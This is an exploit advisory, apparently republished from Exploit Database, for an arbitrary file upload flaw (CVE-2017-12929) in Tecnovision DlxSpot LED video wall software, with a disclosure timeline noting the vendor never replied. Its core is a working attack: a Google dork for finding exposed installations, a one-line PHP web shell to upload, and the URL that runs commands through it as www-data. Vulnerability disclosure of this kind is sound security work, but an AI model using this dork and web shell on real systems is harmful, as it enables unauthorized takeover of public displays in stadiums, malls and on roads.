Tecnovision DLX Spot – Arbitrary File Upload

• Exploit Database
• 11 阅读

• 作者： Simon Brannstrom
  日期： 2017-05-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42755/

• # Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
  to RCE
  # Google Dork: "DlxSpot - Player4"
  # Date: 2017-05-14
  # Discoverer: Simon Brannstrom
  # Authors Website: https://unknownpwn.github.io/
  # Vendor Homepage: http://www.tecnovision.com/
  # Software Link: n/a
  # Version: >1.5.10
  # Tested on: Linux
  # About: DlxSpot is the software controlling Tecnovision LED Video Walls
  all over the world, they are used in football arenas, concert halls,
  shopping malls, as roadsigns etc.
  # CVE: CVE-2017-12929
  # Linked CVE's: CVE-2017-12928, CVE-2017-12930.
  
  # Visit my github page at
  https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
  for complete takeover of the box, from SQLi to root access.
  ###############################################################################################################################
  
  Arbitrary File Upload leading to Remote Command Execution:
  
  1. Visit http://host/resource.php and upload PHP shell. For example: <?php
  system($_GET["c"]); ?>
  2. RCE via http://host/resource/source/shell.php?c=id
  3. Output: www-data
  
  TIMELINE:
  2017-05-14 - Discovery of vulnerabilities.
  2017-05-15 - Contacted Tecnovision through contact form on manufacturer
  homepage.
  2017-06-01 - No response, tried contacting again through several contact
  forms on homepage.
  2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
  requesting CVE assignment.
  2017-08-17 - Three CVE's assigned for the vulnerabilities found.
  2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
  email in Italian to the company.
  2017-09-18 - No response, full public disclosure.
  
  DEDICATED TO MARCUS ASTROM
  FOREVER LOVED - NEVER FORGOTTEN